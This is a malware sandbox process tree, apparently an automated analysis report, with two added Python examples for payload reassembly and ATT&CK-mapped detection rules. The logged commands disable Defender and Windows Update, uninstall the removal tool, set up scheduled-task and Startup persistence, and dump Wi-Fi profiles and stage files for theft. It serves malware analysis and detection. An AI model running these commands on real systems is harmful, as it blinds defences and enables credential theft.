            schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
            6⤵
            • DcRat
            • Creates scheduled task(s)
            PID:652
    • C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe
      "C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"
      3⤵
      • Executes dropped EXE
      PID:5000
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        4⤵
        PID:3060
      • C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe
        "C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"
        4⤵
        • Executes dropped EXE
        PID:1996
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          5⤵
          • Modifies data under HKEY_USERS
          PID:1168
    • C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe
      "C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe"
      3⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:3148
    • C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe
      "C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe"
      3⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Drops file in System32 directory
      PID:3052
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        4⤵
        PID:5384
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        4⤵
        PID:5428
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          5⤵
          PID:3496
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop UsoSvc
        4⤵
        • Launches sc.exe
        PID:4736
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        4⤵
        • Launches sc.exe
        PID:1220
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop wuauserv
        4⤵
        • Launches sc.exe
        PID:3944
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop bits
        4⤵
        • Launches sc.exe
        PID:2064
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop dosvc
        4⤵
        • Launches sc.exe
        PID:6124
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        4⤵
        PID:2960
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        4⤵
        PID:2900
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        4⤵
        PID:1812
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        4⤵
        PID:5472
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop eventlog
        4⤵
        • Launches sc.exe
        PID:2336
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
        4⤵
        • Launches sc.exe
        PID:5860
    • C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
      "C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe" --silent --allusers=0
      3⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Enumerates connected drives
      PID:2108
      • C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
        C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6c9a21c8,0x6c9a21d4,0x6c9a21e0
        4⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:6108
      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z5Pwcmkmjtj7jGqzkWXixJVL.exe" --version
        4⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:3400
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
    2⤵
    PID:5736
• C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3908 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:3
  1⤵
  PID:4156
• C:\ProgramData\Google\Chrome\updater.exe
  C:\ProgramData\Google\Chrome\updater.exe
  1⤵
  • Drops file in Drivers directory
  • Executes dropped EXE
  • Drops file in System32 directory
  • Suspicious use of SetThreadContext
  PID:536
  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    2⤵
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    PID:5396
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    2⤵
    PID:5348
    • C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      3⤵
      PID:5620
  • C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    2⤵
    • Launches sc.exe
    PID:5492
  • C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    2⤵
    • Launches sc.exe
    PID:3832
  • C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    2⤵
    • Launches sc.exe
    PID:5076
  • C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    2⤵
    • Launches sc.exe
    PID:5600
  • C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    2⤵
    • Launches sc.exe
    PID:5788
  • C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    2⤵
    PID:3912
  • C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    2⤵
    PID:1168
  • C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    2⤵
    PID:844
  • C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    2⤵
    PID:2712
  • C:\Windows\system32\conhost.exe
    C:\Windows\system32\conhost.exe
    2⤵
    PID:508
  • C:\Windows\explorer.exe
    explorer.exe
    2⤵
    PID:3008
• C:\Windows\system32\mmc.exe
  "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s
  1⤵
  • Drops file in System32 directory
  • Suspicious behavior: GetForegroundWindowSpam
  • Suspicious use of AdjustPrivilegeToken
  • Suspicious use of SetWindowsHookEx
  PID:4688
• C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\85CB.bat" "
  1⤵
  PID:5788
  • C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
    2⤵
    PID:4060
• C:\Users\Admin\AppData\Local\Temp\DD14.exe
  C:\Users\Admin\AppData\Local\Temp\DD14.exe
  1⤵
  • Executes dropped EXE
  • Suspicious use of SetThreadContext
  PID:3404
  • C:\Users\Admin\AppData\Local\Temp\DD14.exe
    C:\Users\Admin\AppData\Local\Temp\DD14.exe
    2⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Adds Run key to start application
    PID:2712
    • C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\0e5d7f2d-6754-4be0-b473-73a35806b01c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      3⤵
      • Modifies file permissions
      PID:336
    • C:\Users\Admin\AppData\Local\Temp\DD14.exe
      "C:\Users\Admin\AppData\Local\Temp\DD14.exe" --Admin IsNotAutoStart IsNotTask
      3⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      PID:5992
      • C:\Users\Admin\AppData\Local\Temp\DD14.exe
        "C:\Users\Admin\AppData\Local\Temp\DD14.exe" --Admin IsNotAutoStart IsNotTask
        4⤵
        • Executes dropped EXE
                                                                                                PID:5392
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 572
                                                                                                  5⤵
                                                                                                  • Program crash
                                                                                                  PID:536
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5388 -ip 5388
                                                                                          1⤵
                                                                                            PID:4564
                                                                                          • C:\Users\Admin\AppData\Local\Temp\8F7.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\8F7.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:3352
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              2⤵
                                                                                                PID:2348
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5392 -ip 5392
                                                                                              1⤵
                                                                                                PID:6052
                                                                                              • C:\Users\Admin\AppData\Roaming\cwvffbi
                                                                                                C:\Users\Admin\AppData\Roaming\cwvffbi
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:5488
                                                                                              • C:\Windows\windefender.exe
                                                                                                C:\Windows\windefender.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:5880
                                                                                              • C:\Users\Admin\AppData\Local\Temp\B159.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\B159.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5476
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B64C.bat" "
                                                                                                1⤵
                                                                                                  PID:5524
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                    2⤵
                                                                                                      PID:5720
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\EE16.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\EE16.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:3852
                                                                                                    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                      2⤵
                                                                                                        PID:4764
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7FD3.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\7FD3.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3924
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                                                        2⤵
                                                                                                          PID:5028
• C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2064 -ip 2064
  1⤵
  PID:436
• C:\ProgramData\Google\Chrome\updater.exe
  C:\ProgramData\Google\Chrome\updater.exe
  1⤵
  • Executes dropped EXE
  PID:6064
  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    2⤵
    • Modifies data under HKEY_USERS
    PID:3444
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    2⤵
    PID:1092
    • C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      3⤵
      PID:5700
  • C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    2⤵
    • Launches sc.exe
    PID:5400
  • C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    2⤵
    • Launches sc.exe
    PID:3112
  • C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    2⤵
    • Launches sc.exe
    PID:2364
  • C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    2⤵
    • Launches sc.exe
    PID:2072
  • C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    2⤵
    • Launches sc.exe
    PID:4032
  • C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    2⤵
    PID:4024
  • C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    2⤵
    PID:3660
  • C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    2⤵
    PID:2172
  • C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    2⤵
    PID:2064
• C:\Users\Admin\AppData\Local\Temp\58E.exe
  C:\Users\Admin\AppData\Local\Temp\58E.exe
  1⤵
  PID:5036
  • C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Jeffrey Jeffrey.bat & Jeffrey.bat & exit
    2⤵
    PID:6008
    • C:\Windows\SysWOW64\tasklist.exe
      tasklist
      3⤵
      • Enumerates processes with tasklist
      PID:3560
    • C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      3⤵
      PID:4436
    • C:\Windows\SysWOW64\tasklist.exe
      tasklist
      3⤵
      • Enumerates processes with tasklist
      PID:640
    • C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
      3⤵
      PID:4956
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c md 8484
      3⤵
      PID:3760
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Sitemap + Sublimedirectory + Cow + Rss + Josh 8484\Http.pif
      3⤵
      PID:2444
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Cdt + Thumbnail + Powers + Tamil + Capabilities + Novel + Cos + Breach + Canal + Hobby + Debut + Patricia + Neural + Translations + Fist + Able + Warner + Shapes + Ancient + Plans + Greg + Go + Drain + Mpeg + Necessary + Robertson + Islam + Generations + Trim + Around + Companion + Maiden + Kills + Eat + Brunswick + Ww + Determines + Login + Heads + Wv + Vampire + Consequence + Tba 8484\F
      3⤵
      PID:3744
    • C:\Users\Admin\AppData\Local\Temp\8484\Http.pif
      8484\Http.pif 8484\F
      3⤵
      PID:1220
    • C:\Windows\SysWOW64\PING.EXE
      ping -n 5 127.0.0.1
      3⤵
      • Runs ping.exe
      PID:5700
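The two `copy /b` lines under 58E.exe rebuild executables from innocuously named fragments (five pieces into 8484\Http.pif, forty-three into 8484\F, which Http.pif then takes as its argument), so no single dropped file needs to look like a program until the batch script joins them. The analyst's first job is to redo that join in exactly the command line's order. As an added example, not the report's or the sample's own code, the Python below pulls the fragment order and destination out of a `copy /b` command line, concatenates recovered fragments the way `copy /b` does, and checks the result for an MZ/PE header. The fragment bytes are constructed here because the report ships no files; the names and the command lines are the ones above.

```python
"""Reassembly of a payload that a dropper rebuilds with
`copy /b A + B + ... dest`, driven by the dropper's own command line.
Added example; the fragment bytes are constructed, the report ships no files."""
import re
import struct

_COPY_B = re.compile(r"\bcopy\s+/b\s+(?P<parts>.+?)\s+(?P<dest>\S+)\s*$", re.I)

def parse_copy_b(cmdline: str):
    """(ordered fragment names, destination) from a `copy /b` command line."""
    m = _COPY_B.search(cmdline)
    if not m:
        raise ValueError("not a copy /b command line: " + cmdline)
    parts = [p.strip() for p in m.group("parts").split("+")]
    return parts, m.group("dest")

def reassemble(fragments: dict, order: list) -> bytes:
    """Binary concatenation in command-line order, which is all copy /b does.
    Fails loudly if a fragment named on the command line was not recovered."""
    missing = [n for n in order if n not in fragments]
    if missing:
        raise KeyError("fragments not recovered: " + ", ".join(missing))
    return b"".join(fragments[n] for n in order)

def looks_like_pe(data: bytes) -> bool:
    """'MZ' at offset 0 and the PE signature at the e_lfanew offset stored at 0x3C."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def constructed_fragments() -> dict:
    """Constructed sample: a minimal MZ/PE stub cut at offsets that run through
    the DOS header, so the first fragment on its own does not validate."""
    stub = bytearray(b"MZ" + b"\0" * 0x3E)          # 0x40-byte DOS header
    struct.pack_into("<I", stub, 0x3C, 0x40)        # e_lfanew -> 0x40
    stub += b"PE\0\0" + b"\0" * 0x1C                # start of the NT headers
    stub += bytes(range(256)) * 4                   # filler standing in for code
    names = ["Sitemap", "Sublimedirectory", "Cow", "Rss", "Josh"]   # names from the report
    cuts = [0, 0x20, 0x50, 0x100, 0x300, len(stub)]
    return {n: bytes(stub[cuts[i]:cuts[i + 1]]) for i, n in enumerate(names)}

if __name__ == "__main__":
    cmd = r"cmd /c copy /b Sitemap + Sublimedirectory + Cow + Rss + Josh 8484\Http.pif"
    order, dest = parse_copy_b(cmd)
    blob = reassemble(constructed_fragments(), order)
    state = "present" if looks_like_pe(blob) else "absent"
    print(f"{dest}: {len(blob)} bytes, PE header {state}")
```

On a real case the fragments come from the dropper's working directory (here the same %TEMP% folder 58E.exe ran from) and the reassembled 8484\Http.pif and 8484\F are what go to static analysis; the `.pif` extension is only a rename, Windows runs a PE regardless. A fragment missing from the set raises rather than silently producing a truncated file, which is the failure mode to watch for when the sandbox's file capture was incomplete.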
• C:\Users\Admin\AppData\Local\Temp\1510.exe
  C:\Users\Admin\AppData\Local\Temp\1510.exe
  1⤵
  PID:3040
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    2⤵
    PID:5396
• C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4132 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
  1⤵
  PID:532
• C:\Windows\SYSTEM32\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & echo URL="C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & exit
  1⤵
  PID:1808
• C:\Windows\SYSTEM32\cmd.exe
  cmd /c schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F
  1⤵
  PID:4312
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F
    2⤵
    • DcRat
    • Creates scheduled task(s)
    PID:2420
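Almost everything that matters in this tree is readable straight off the command lines: updater.exe excludes %UserProfile%, %ProgramData% and every .exe from Defender, stops UsoSvc, WaaSMedicSvc, wuauserv, bits and dosvc, uninstalls KB890830 (the Windows Malicious Software Removal Tool) and zeroes the sleep and hibernate timeouts; the 58E.exe batch script greps tasklist output for AV processes (wrsa.exe, opssvc.exe, avastui.exe, avgui.exe, nswscsvc.exe, sophoshealth.exe); DD14.exe denies Everyone (S-1-1-0) delete rights on a folder under AppData with icacls; and the CodeForge.js persistence is a Startup-folder .url plus a schtasks job firing every three minutes. As an added example covering the updater.exe, 58E.exe, DD14.exe and CodeForge entries together, the Python below is a small rule table of my own (not a vendor signature set) that maps those command lines to ATT&CK technique IDs and says whether the chain both evades and persists. The command lines in the sample list are copied from the tree above; the one svchost line is constructed as a benign control.

```python
"""Indicator triage over the child command lines in the tree above.
Added example: the rules and the technique mapping are mine, kept small."""
import re

# (rule, ATT&CK technique, pattern). Assumptions about what the command lines
# above have in common, not a vendor signature set.
RULES = [
    ("defender_exclusion", "T1562.001",
     re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Extension|Process)", re.I)),
    ("update_service_stop", "T1489",
     re.compile(r"\bsc(\.exe)?\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I)),
    ("msrt_uninstall", "T1562.001",            # KB890830 = Malicious Software Removal Tool
     re.compile(r"\bwusa\b.*?/uninstall\b.*?/kb:890830\b", re.I)),
    ("sleep_disabled", "T1562.001",
     re.compile(r"\bpowercfg(\.exe)?\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0\b", re.I)),
    ("av_process_check", "T1518.001",
     re.compile(r'\bfindstr\s+/I\s+"[^"]*\b(avastui|avgui|wrsa|opssvc|nswscsvc|sophoshealth)\.exe', re.I)),
    ("deny_delete_acl", "T1222.001",
     re.compile(r"\bicacls\b.*?/deny\s+\*S-1-1-0:\(OI\)\(CI\)\(DE,DC\)", re.I)),
    ("minute_task_wscript", "T1053.005",
     re.compile(r'\bschtasks(\.exe)?\s+/create\b.*?/tr\s+"wscript\b.*?/sc\s+minute\b', re.I)),
    ("startup_url_shortcut", "T1547.001",
     re.compile(r'\\Start Menu\\Programs\\Startup\\[^"]+\.url', re.I)),
]
PERSISTENCE = {"minute_task_wscript", "startup_url_shortcut"}   # everything else is evasion

def triage(cmdlines: list) -> dict:
    """rule -> {'technique': id, 'cmdlines': [matching lines]}"""
    hits = {}
    for cl in cmdlines:
        for name, tid, pat in RULES:
            if pat.search(cl):
                hits.setdefault(name, {"technique": tid, "cmdlines": []})["cmdlines"].append(cl)
    return hits

def verdict(hits: dict) -> str:
    """'evasion+persistence', 'evasion', 'persistence' or 'none'. A chain that
    both blinds the host and schedules itself is the one to escalate."""
    persists = bool(set(hits) & PERSISTENCE)
    evades = bool(set(hits) - PERSISTENCE)
    return {(True, True): "evasion+persistence", (True, False): "evasion",
            (False, True): "persistence", (False, False): "none"}[(evades, persists)]

# Command lines copied from the tree above, plus one constructed benign line.
SAMPLE_CMDLINES = [
    r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force",
    r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart",
    r"C:\Windows\system32\sc.exe stop UsoSvc",
    r"C:\Windows\system32\sc.exe stop WaaSMedicSvc",
    r"C:\Windows\system32\sc.exe stop wuauserv",
    r"C:\Windows\system32\sc.exe stop bits",
    r"C:\Windows\system32\sc.exe stop dosvc",
    r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0",
    r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0",
    r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0",
    r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0",
    r'findstr /I "wrsa.exe opssvc.exe"',
    r'findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"',
    r'icacls "C:\Users\Admin\AppData\Local\0e5d7f2d-6754-4be0-b473-73a35806b01c" /deny *S-1-1-0:(OI)(CI)(DE,DC)',
    r'cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & echo URL="C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & exit',
    r"""schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F""",
    r"C:\Windows\system32\svchost.exe -k netsvcs",   # constructed benign control line
]

if __name__ == "__main__":
    found = triage(SAMPLE_CMDLINES)
    for name, info in found.items():
        print(f"{info['technique']:10} {name:22} x{len(info['cmdlines'])}")
    print("verdict:", verdict(found))
```

The table is deliberately narrow: each pattern is tied to the exact flags seen here (the five service names, the MSRT KB number, the S-1-1-0 deny ACE), so it will miss variants, which is the right trade-off for a triage script whose job is to turn this one report into ticket text. Widen the patterns only with a corpus of benign admin command lines to test them against, since `sc stop wuauserv` and `powercfg /x` also appear in legitimate build and imaging scripts.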
• C:\Users\Admin\AppData\Local\Temp\4E32.exe
  C:\Users\Admin\AppData\Local\Temp\4E32.exe
  1⤵
  PID:1752
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    2⤵
    PID:3268
• C:\Users\Admin\AppData\Local\Temp\C95E.exe
  C:\Users\Admin\AppData\Local\Temp\C95E.exe
  1⤵
  PID:3280
  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe"
                                                                                                                                                      1⤵
                                                                                                                                                        PID:1604
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x1000040,0x100004c,0x1000058
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3984
                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                          explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5480
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2420
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:6032
                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1268
                                                                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                                                                        netsh wlan show profiles
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5136
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4248
                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2764
